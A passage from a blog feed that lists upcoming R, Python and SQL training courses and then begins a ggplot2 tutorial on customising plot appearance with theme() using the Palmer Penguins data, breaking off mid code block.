&lt;h4 id="introduction-to-bayesian-inference-using-rstan"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;Introduction to Bayesian Inference using RStan&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th January 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Despite the promise of big data, inferences are often limited by its systematic structure. Only by carefully modelling this structure can we take full advantage of the data. Stan is a platform for facilitating this modelling, providing an expressive modelling language to implement state-of-the-art algorithms, to draw subsequent Bayesian inferences. &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;This course&lt;/a&gt; will teach participants how to interface with Stan through R!&lt;/p&gt;
&lt;img src="normal-curve.jpg" alt="CUSP London logo" style="width: 600px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 26th February 2024 &amp;amp; 13th May 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 4th March 2024 &amp;amp; 3rd June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2024 &amp;amp; 17th June 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;This course&lt;/a&gt; will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving onto complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;img src="informal-python.jpg" alt="CUSP London logo" style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="sql"&gt;SQL&lt;/h3&gt;
&lt;h4 id="introduction-to-sql"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;Introduction to SQL&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 14th February 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Structured Query Language (SQL) defines a standard for communicating with a relational database. In &lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn the basic SQL syntax for data extraction, filtering and insertion. We will start by querying a local database before connecting to a remote database held on an AWS server. Here, we will stress important considerations when working with shared databases in the cloud.&lt;/p&gt;
&lt;h4 id="an-introduction-to-sql-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;An Introduction to SQL with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. The main focus of &lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;this training course&lt;/a&gt; is to introduce SQL databases, write your first SQL queries, and show how R can be used to retrieve and manipulate data stored in a relational database. The course uses both the {DBI} and {dbplyr} packages.&lt;/p&gt;
&lt;p&gt;We use the &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example for public courses. For in-house training, we are happy to adapt the course to match your database requirements.&lt;/p&gt;
&lt;h4 id="introduction-to-sql-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;Introduction to SQL with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2024&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. &lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;This training course&lt;/a&gt; introduces SQL databases and the SQL command syntax, and shows how Python can be used to retrieve and manipulate data held in a relational database. The course also discusses how SQLAlchemy can be used to define and interact with databases using object-oriented Python code.&lt;/p&gt;
&lt;p&gt;We use a &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example, and communicate with this using a psycopg2 connection.&lt;/p&gt;
&lt;h3 id="so-what-now"&gt;So what now?&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re interested in attending any of our public courses, then you can head straight over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public booking page&lt;/a&gt;! If you&amp;rsquo;re looking for training for your team, or maybe even something a bit more bespoke, then &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt; and we&amp;rsquo;ll see what we can do! All of our training courses can be find on our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course catalogue&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2024-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Getting started with theme()</title><link>https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/</link><pubDate>Thu, 23 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;theme()&lt;/code&gt; function in {ggplot2} is awesome. Although it’s only one function, it gives you so much control over your final plot. &lt;code&gt;theme()&lt;/code&gt; allows us to generate a consistent, in-house style for our graphics, modify the text within our plots and more. Getting comfortable with &lt;code&gt;theme()&lt;/code&gt; will really take your {ggplot2} skills up a notch.&lt;/p&gt;
&lt;p&gt;Normally, when people want help with an R function I tell them to use the built-in documentation about the function. This is normally done by typing &lt;code&gt;?function_name&lt;/code&gt; into the console. It’s usually pretty informative and often enough to help people understand a new function.&lt;/p&gt;
&lt;p&gt;So let’s try this with &lt;code&gt;theme()&lt;/code&gt; …&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;?&lt;/span&gt;theme
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You probably feel a bit like this now:&lt;/p&gt;
&lt;img src="graphics/overflowing_cupboard.gif" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes) but grid lines have been removed, so that the points on the scatter plot are on a plain, white background." style="width: 60%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;If you&amp;rsquo;re coding along with me you&amp;rsquo;ll be able to see there&amp;rsquo;s loads of arguments to &lt;code&gt;theme()&lt;/code&gt;. If you&amp;rsquo;re patient and like counting, you&amp;rsquo;ll find that there are &lt;em&gt;ninety-nine&lt;/em&gt; arguments to the &lt;code&gt;theme()&lt;/code&gt; function.&lt;/p&gt;
&lt;p&gt;Do you need to know all of these arguments? &lt;em&gt;No.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do I know all of these arguments? &lt;em&gt;Also no&lt;/em&gt;.&lt;/p&gt;
&lt;h3 id="what-to-we-want-to-achieve"&gt;What to we want to achieve?&lt;/h3&gt;
&lt;p&gt;By the end of this blog post, you are going to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;become familiar with a handful of &lt;code&gt;theme()&lt;/code&gt; arguments&lt;/li&gt;
&lt;li&gt;be able to understand how to modify theme elements&lt;/li&gt;
&lt;li&gt;have built the confidence to try modifying aspects of a theme on your own&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What I&amp;rsquo;m not aiming to do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;construct a the world&amp;rsquo;s most elegant {ggplot2} theme&lt;/li&gt;
&lt;li&gt;show you every single thing that can be modified via &lt;code&gt;theme()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Basically, I want to give you the tools to make your plots look the way you want them to.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s also worth mentioning that this post is peppered with personal opinion; I want you to absorb how I&amp;rsquo;ve managed to implement my stylistic choices, not take these choices as the &amp;ldquo;truth&amp;rdquo;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-theme-command"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="building-a-basic-plot"&gt;Building a basic plot&lt;/h3&gt;
&lt;p&gt;In order to modify a plot theme, we&amp;rsquo;re going to need a plot to start with. We&amp;rsquo;re going to work with a simple scatter plot derived from the Palmer Penguins data set. The data are freely available via the {palmerpenguins} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;RColorBrewer&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# pkg for nice colours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; palmerpenguins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;penguins
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;brewer.pal&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Set2&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# pick some nice colours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# remove missing values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; body_mass_g, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bill_length_mm, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; palette) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Do heavier penguins have longer bills?&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Species&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Body mass (g)&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Bill length (mm)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/base.png" alt="A scatter plot showing bill length (mm) vs body mass (g) for three penguin species which are seperated by colour; Adelie, Chinstrap and Gentoo. The plot is styled using standard basic ggplot2 theme; the plot background is grey with white gridlines. Title (Do heavier penguins have longer bills?) is left justified and the legend is to the right of the plot." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We&amp;rsquo;ve created a basic scatter plot here. It&amp;rsquo;s perhaps one you&amp;rsquo;ve seen before. Perfectly functional, but lacks personality.&lt;/p&gt;
&lt;h3 id="using-built-in-ggplot2-themes"&gt;Using built in {ggplot2} themes&lt;/h3&gt;
&lt;p&gt;A good starting point for modifying your plot theme is actually to side-step &lt;code&gt;theme()&lt;/code&gt; and use one of the themes provided by {ggplot2}. The themes all have similar names: &lt;code&gt;theme_*()&lt;/code&gt;. I personally tend to start with &lt;code&gt;theme_minimal()&lt;/code&gt;, but feel free to try some others. For example, &lt;code&gt;theme_classic()&lt;/code&gt; or &lt;code&gt;theme_light()&lt;/code&gt;. The usage of these themes is super simple, just add it to your plot a bit like a &lt;code&gt;geom_*()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; base_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/minimal.png" alt="The same scatter plot as before but with the ggplot theme theme_minimal() applied. The background is now white and the grid lines are a light grey colour." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We&amp;rsquo;ve now got a plot which looks cleaner. There&amp;rsquo;s still some things that I don&amp;rsquo;t like. For example, I don&amp;rsquo;t like having my legend at the side of the plot and I don&amp;rsquo;t like the grid lines. We can modify these with &lt;code&gt;theme()&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="our-first-theme-modification"&gt;Our first theme() modification&lt;/h3&gt;
&lt;p&gt;The first thing I like to do is move the legend to the bottom of the plot. This is where we start to use the &lt;code&gt;theme()&lt;/code&gt; function to modify our plot appearance. This one isn&amp;rsquo;t too tricky, we just specify (as a string) where we want our legend to sit.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And here&amp;rsquo;s the result:&lt;/p&gt;
&lt;img src="graphics/legend.png" alt="The same scatter plot as before but the legend has been moved from the right of the plot to below the plot." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Okay, that wasn&amp;rsquo;t too bad. The other options here would be &lt;code&gt;&amp;quot;top&amp;quot;&lt;/code&gt;, &lt;code&gt;&amp;quot;left&amp;quot;&lt;/code&gt; or &lt;code&gt;&amp;quot;right&amp;quot;&lt;/code&gt; to modify the position, or &lt;code&gt;&amp;quot;none&amp;quot;&lt;/code&gt; to remove the legend entirely.&lt;/p&gt;
&lt;h3 id="id-like-to-you-meet-my-friends-the-element_-functions"&gt;I&amp;rsquo;d like to you meet my friends: the element_*() functions&lt;/h3&gt;
&lt;p&gt;Most arguments of the &lt;code&gt;theme()&lt;/code&gt; function don&amp;rsquo;t take simple values like character or numeric values as arguments. A large number of the arguments take in a list of a specific class, where the list elements describe what the plot looks like. We can generate this list via an &lt;code&gt;element_*()&lt;/code&gt; function. The functions are &lt;code&gt;element_blank()&lt;/code&gt;, &lt;code&gt;element_rect()&lt;/code&gt;, &lt;code&gt;element_line()&lt;/code&gt;, &lt;code&gt;element_text()&lt;/code&gt;. Each of these functions has arguments which modify a given feature of our plot. I&amp;rsquo;ll run you through how each of the &lt;code&gt;element_*()&lt;/code&gt; functions might be used, but remember just like any other function &lt;code&gt;?element_*()&lt;/code&gt; will show you more&lt;/p&gt;
&lt;h4 id="modifying-line-elements"&gt;Modifying line elements&lt;/h4&gt;
&lt;p&gt;Now our plot doesn&amp;rsquo;t have any lines on to indicate where the axes are. Suppose I want to make it clear where the axis lines are. Because these are, well, &lt;em&gt;lines&lt;/em&gt;, I can use &lt;code&gt;element_line()&lt;/code&gt; to include them as so:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;obviously we all have different favourite colours, use whatever you like. Neutral colours (probably just shades of grey) are probably best for anything professional or for publication.&lt;/p&gt;
&lt;img src="graphics/axis.png" alt="The same scatter plot as above (theme minimal, legend at bottom) but grey lines to make the x and y axes clear have been added." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;So here we&amp;rsquo;ve specified the colour of the line element which corresponds to &lt;code&gt;axis.line&lt;/code&gt;. We can change other characteristics here like &lt;code&gt;linewidth&lt;/code&gt; or &lt;code&gt;linetype&lt;/code&gt;, but I&amp;rsquo;ll leave that for you to experiment with later.&lt;/p&gt;
&lt;h4 id="removing-plot-elements"&gt;Removing plot elements&lt;/h4&gt;
&lt;p&gt;The next thing I want to modify is the grid lines. I personally don&amp;rsquo;t like them so I&amp;rsquo;m going to remove them. This &lt;em&gt;could&lt;/em&gt; be done with &lt;code&gt;element_line()&lt;/code&gt; by matching the grid line colour to the background colour, but off the top of my head I don&amp;rsquo;t know what the background colour is, and there&amp;rsquo;s a much simpler solution: &lt;code&gt;element_blank()&lt;/code&gt;. This removes aspects of our plot by generating an empty list entry for that plot component.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/grid.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes) but grid lines have been removed, so that the points on the scatter plot are on a plain, white background." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;assigning &lt;code&gt;element_blank()&lt;/code&gt; to &lt;code&gt;panel.grid()&lt;/code&gt; removes all grid lines. If we only wanted to remove the minor ones, we would set &lt;code&gt;panel.grid.minor = element_blank()&lt;/code&gt;. If we wanted to remove only the vertical lines (for whatever reason), we can set &lt;code&gt;panel.grid.minor.x = element_blank()&lt;/code&gt; and &lt;code&gt;panel.grid.major.x = element_blank()&lt;/code&gt;. Removing only the horizontal ones is the same, but swap &lt;code&gt;x&lt;/code&gt; for &lt;code&gt;y&lt;/code&gt;. This shows that although &lt;code&gt;theme()&lt;/code&gt; might have 99 arguments, there is structure to argument names which reduces how many you really need to remember.&lt;/p&gt;
&lt;h4 id="modifying-text-features"&gt;Modifying text features&lt;/h4&gt;
&lt;p&gt;Text features are the next thing I&amp;rsquo;m going to change. We&amp;rsquo;re going to do two things at once here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;change the font for &lt;em&gt;all&lt;/em&gt; text features with the &lt;code&gt;text&lt;/code&gt; argument&lt;/li&gt;
&lt;li&gt;change the positioning and size of the plot title with the &lt;code&gt;plot.title&lt;/code&gt; argument&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;we&amp;rsquo;ll adjust both of these via the &lt;code&gt;element_text()&lt;/code&gt; function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
